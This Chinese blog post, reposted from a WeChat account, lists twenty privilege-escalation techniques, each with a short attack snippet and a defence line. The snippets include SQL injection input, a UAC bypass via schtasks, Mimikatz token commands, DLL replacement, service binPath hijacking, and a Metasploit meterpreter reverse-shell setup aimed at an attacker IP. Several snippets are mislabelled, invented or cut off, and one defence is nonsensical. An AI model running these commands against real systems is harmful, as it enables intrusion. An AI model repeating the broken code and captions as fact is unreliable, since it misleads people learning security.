大家好,我是Dest1ny。
这篇文章是我从自己新建的wx号上所转载的。
号为:Des极客安全
希望大家多多点赞!
1. 内核核溢出漏洞提权
原理: 攻击者通过精心构造输入数据,触发内核溢出,执行恶意代码以提升权限。
攻击方法: 利用系统内核溢出漏洞,发送恶意数据包。
攻击代码(示例):
#include <stdio.h>
#include <string.h>
void vulnerable_function(char *input) {
char buffer[64];
strcpy(buffer, input); // vulnerable to buffer overflow
}
int main(int argc, char *argv[]) {
if (argc > 1) {
vulnerable_function(argv[1]);
}
return 0;
}
2. 数据库提权
原理: 攻击者通过SQL注入、弱密码等方法,控制数据库服务器,提升权限。
攻击方法: 使用SQL注入获取管理员权限。
攻击代码(SQL注入示例):
' OR 1=1; --
3. 系统配置错误提权
原理: 利用管理员配置错误,获得系统控制。
攻击方法: 查找配置文件中的弱密码或可执行漏洞。
攻击代码(查找计划任务配置):
cat /etc/passwd
4. 组策略首选项提权
原理: 攻击者通过修改Windows组策略首选项,执行恶意代码。
攻击方法: 修改计划任务或启动脚本来提升权限。
攻击代码(利用组策略首选项):
# Manipulate registry to exploit group policy preferences
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "GroupPolicy" /t REG_DWORD /d 0 /f
5. Bypass UAC提权
原理: 绕过UAC(用户账户控制)限制,提升权限。
攻击方法: 修改注册表或利用系统漏洞绕过UAC。
攻击代码(绕过UAC示例):
# Example of bypassing UAC using a scheduled task
schtasks /create /tn "bypassUAC" /tr "cmd.exe /c calc.exe" /sc once /st 00:00 /f
防范措施: 保持UAC启用,限制对注册表的访问。
6. 令牌窃取提权
原理: 攻击者窃取其他用户的令牌,以该用户身份执行操作。
攻击方法: 使用工具窃取令牌并执行更高权限操作。
攻击代码(使用Mimikatz工具):
# Mimikatz command to dump security tokens
mimikatz # token::list
防范措施: 加强令牌管理,限制对令牌的访问。
7. DLL劫持提权
原理: 攻击者通过替换系统DLL文件,执行恶意代码。
攻击方法: 替换系统DLL路径中的恶意DLL文件。
攻击代码(DLL劫持示例):
# Example of replacing a legitimate DLL with a malicious one
copy malicious.dll C:\Windows\System32\legitimate.dll
防范措施: 使用完整性检查,限制对DLL路径的写入权限。
8. 第三方软件/服务提权
原理: 利用第三方软件的漏洞或配置错误提权。
攻击方法: 寻找未打补丁的漏洞,利用弱密码进行攻击。
防范措施: 定期更新第三方软件和服务,严格权限管理。
9. AT命令提权
原理: 使用Windows AT命令安排任务,执行恶意代码。
攻击方法: 使用AT命令在系统中创建恶意任务。
攻击代码(AT命令示例):
# Create a scheduled task with AT to run malicious command
at 12:00 /interactive cmd.exe
防范措施: 限制AT命令权限,管理计划任务。
10. SC命令提权
原理: 攻击者利用SC命令操作服务,提升权限。
攻击方法: 修改服务配置,替换服务可执行文件。
攻击代码(SC命令示例):
# Replace service executable to run malicious code
sc config ServiceName binPath= "C:\malicious\path.exe"
防范措施: 严格配置服务权限,管理服务路径。
11. 令牌烂土豆提权
原理: 利用Windows令牌管理漏洞,通过伪造令牌提升权限。
攻击方法: 攻击者伪造系统令牌,执行高级权限操作。
防范措施: 加强令牌管理,限制对高级令牌的访问。
12. 进程迁移注入提权
原理: 攻击者将恶意代码注入到高权限进程中。
攻击方法: 使用进程注入技术,将恶意代码迁移至高权限进程。
攻击代码(使用inject
工具):
# Example of injecting code into a high-privilege process using inject tool
inject.exe -p highpriv_process_id -c malicious_code
防范措施: 加强进程管理,限制对敏感进程的访问。
13. 不带引号服务路径提权
原理: 利用服务路径配置中的漏洞加载恶意可执行文件。
攻击方法: 修改服务路径字符串,插入恶意路径。
攻击代码(修改服务路径示例):
# Modify service path to include malicious executable
sc config ServiceName binPath= "C:\malicious path\malicious.exe
防范措施: 审计服务路径配置,避免路径中的空格问题。
14. 不安全的服务权限提权
原理: 利用服务权限配置不当,获得高权限。
攻击方法: 攻击者通过修改服务配置,提升权限。
防范措施: 正确配置服务权限,限制高权限服务的访问。
15. 注册表键AlwaysInstallElevated提权
原理: 利用注册表键允许低权限用户以系统权限安装软件。
攻击方法: 修改注册表配置,提升权限。
攻击代码(修改注册表示例):
# Set AlwaysInstallElevated registry key
reg add "HKCU\Software\Microsoft\
防范措施: 禁用AlwaysInstallElevated,限制注册表访问权限。
16. 系统信息收集提权
原理: 收集系统信息后,攻击者根据漏洞和配置情况制定提权策略。
攻击方法: 使用工具收集系统信息,找到漏洞利用点。
防范措施: 限制对系统信息的访问,定期更新安全策略。
17. Web中间件漏洞提权
原理: 利用Web中间件的漏洞执行恶意操作。
攻击方法: 扫描Web中间件漏洞,执行系统命令。
防范措施: 定期更新Web中间件,检查配置。
18. 远程桌面协议(RDP)提权
原理: 利用RDP漏洞或配置错误,远程提升权限。
攻击方法: 猜测RDP密码或利用配置漏洞。
防范措施: 加强RDP服务的安全配置,启用双重认证。
19. 漏洞利用框架(如Metasploit)提权
原理: 使用漏洞利用框架自动化攻击,提升权限。
set RHOSTS <target_ip> # 设置目标IP
set RPORT 445 # 设置SMB端口(默认445)
set PAYLOAD windows/x64/meterpreter/reverse_tcp # 设置反向TCP连接有效载荷
set LHOST <your_ip> # 设置本地监听IP地址(即攻击者IP)
set LPORT 4444 # 设置监听端口(攻击者监听的端口)
攻击方法: 使用Metasploit漏洞模块进行提权。
防范措施: 定期更新Metasploit框架,限制访问权限。
20. 社会工程学提权
原理: 利用心理学原理,通过欺骗获得系统权限。
攻击方法: 伪造身份,发送钓鱼邮件等。
防范措施: 加强用户安全培训,提高警惕性。